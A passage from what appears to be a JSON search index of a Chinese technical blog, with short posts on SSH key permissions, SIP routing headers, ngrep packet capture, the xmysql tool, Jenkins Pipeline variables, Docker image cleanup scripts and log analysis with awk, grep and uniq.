open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","title":"ssh 私钥使用失败"},{"content":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via都的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","permalink":"https://wdd.js.org/opensips/ch5/via-route/","summary":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via都的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","title":"SIP路由头"},{"content":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux转包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . # T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily. Server: Apache-Coyote/1.1. Set-Cookie: JSESSIONID=211CA612EC681B9FDCE7726B03F42088; Path=/; HttpOnly. Location: http://192.168.60.200:7775/homepage.action. Content-Type: text/html. Content-Length: 0. Date: Fri, 16 Aug 2019 02:16:51 GMT. 过滤规则 按IP地址过滤 ngrep -W byline host 192.168.60.200 # 源地址或者目的地址是 192.168.60.200 按端口过滤 ngrep -W byline port 80 # 源端口或者目的端口是 80 按照正则匹配 ngrep -W byline -q HTTP # 匹配所有包中含有HTTP的 指定网卡 默认情况下,ngrep使用网卡列表中的一个网卡,当然你也可以使用-d选项来指定抓包某个网卡。\nngrep -W byline -d eth0 host 192.168.60.200 参考 https://www.tecmint.com/ngrep-network-packet-analyzer-for-linux/ https://github.com/jpr5/ngrep ","permalink":"https://wdd.js.org/network/pxn896/","summary":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux转包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . # T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily.","title":"ngrep明文http抓包教程"},{"content":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","permalink":"https://wdd.js.org/posts/2019/08/iyotwd/","summary":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","title":"在不打开文件,将全文复制到剪贴板"},{"content":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","permalink":"https://wdd.js.org/posts/2019/08/gw9eka/","summary":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","title":"macbook pro 开机后wifi无响应问题调研"},{"content":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql\n","permalink":"https://wdd.js.org/posts/2019/08/kieuga/","summary":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql","title":"mysql远程连接速度太慢"},{"content":"github向我推荐这个xmysql时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天给才能我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 安装与使用\nnpm install -g xmysqlxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - /api/tableName/bulk?_ids=1,2,3 DELETE :fire: /api/tableName/bulk Deletes multiple rows - /api/tableName/bulk?_ids=1,2,3 GET /api/tableName/:id Retrieves a row by primary key PATCH /api/tableName/:id Updates row element by primary key DELETE /api/tableName/:id Delete a row by primary key GET /api/tableName/findOne Works as list but gets single record matching criteria GET /api/tableName/count Count number of rows in a table GET /api/tableName/distinct Distinct row(s) in table - /api/tableName/distinct?_fields=col1 GET /api/tableName/:id/exists True or false whether a row exists or not GET /api/parentTable/:id/childTable Get list of child table rows with parent table foreign key GET :fire: /api/tableName/aggregate Aggregate results of numeric column(s) GET :fire: /api/tableName/groupby Group by results of column(s) GET :fire: /api/tableName/ugroupby Multiple group by results using one call GET :fire: /api/tableName/chart Numeric column distribution based on (min,max,step) or(step array) or (automagic) GET :fire: /api/tableName/autochart Same as Chart but identifies which are numeric column automatically - gift for lazy while prototyping GET :fire: /api/xjoin handles join GET :fire: /dynamic execute dynamic mysql statements with params GET :fire: /upload upload single file GET :fire: /uploads upload multiple files GET :fire: /download download a file GET /api/tableName/describe describe each table for its columns GET /api/tables get all tables in database 3 更多资料 项目地址:https://github.com/o1lab/xmysql ","permalink":"https://wdd.js.org/posts/2019/08/vv5oro/","summary":"github向我推荐这个xmysql时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天给才能我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 安装与使用\nnpm install -g xmysqlxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - /api/tableName/bulk?","title":"xmysql 一行命令从任何mysql数据库生成REST API"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)Some methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.However any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.A set of environment variables are made available to all Jenkins projects, including Pipelines. The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds **BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISION As an example of loading variable values from Groovy: mail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. That allows you to write, for example:properties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. Use checkout scm to check out sources matching Jenkinsfile.You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/08/tdeab2/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是被慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有写镜像虽然镜像名不同,但是镜像 ID 都是相同的,这是后往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less then max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G. when current free disk less then max free disk, remove docker images current_free_disk=`df -lh | grep centos-root | awk \u0026#39;{print strtonum($4)}\u0026#39;` df -lh echo \u0026#34;max_free_disk: $max_free_disk G\u0026#34; echo -e \u0026#34;current_free_disk: ${GREEN} $current_free_disk G ${NC}\u0026#34; if [ $current_free_disk -lt $max_free_disk ] then echo -e \u0026#34;${RED} need to clean up docker images ${NC}\u0026#34; docker images | grep none | awk \u0026#39;{print $3 }\u0026#39; | xargs docker rmi docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi else echo -e \u0026#34;${GREEN}no need clean${NC}\u0026#34; fi 注意事项 为了加快打包的速度,一般不要太频繁的删除镜像。因为老的镜像中的某些不改变的层,可以作为新的镜像的缓存,从而大大加快构建的速度。\n","permalink":"https://wdd.js.org/shell/docker-clean-tips/","summary":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是被慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有写镜像虽然镜像名不同,但是镜像 ID 都是相同的,这是后往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less then max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G.","title":"Docker镜像批量清理脚本"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序是,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/log-ana/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","permalink":"https://wdd.js.org/opensips/ch5/condition/","summary":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","title":"条件语句特点"},{"content":" 将opensips.cfg文件中的,log_stderror的值改为yes, 让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","permalink":"https://wdd.js.org/opensips/ch7/without-log/","summary":" 将opensips.cfg文件中的,log_stderror的值改为yes, 让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","title":"opensips启动失败没有任何报错日志"},{"content":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。\n","permalink":"https://wdd.js.org/posts/2019/08/ym77uc/","summary":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。","title":"【笔记】操作系统:虚拟化 并发 持久化"},{"content":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否者只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","permalink":"https://wdd.js.org/posts/2019/08/vqergg/","summary":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否者只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 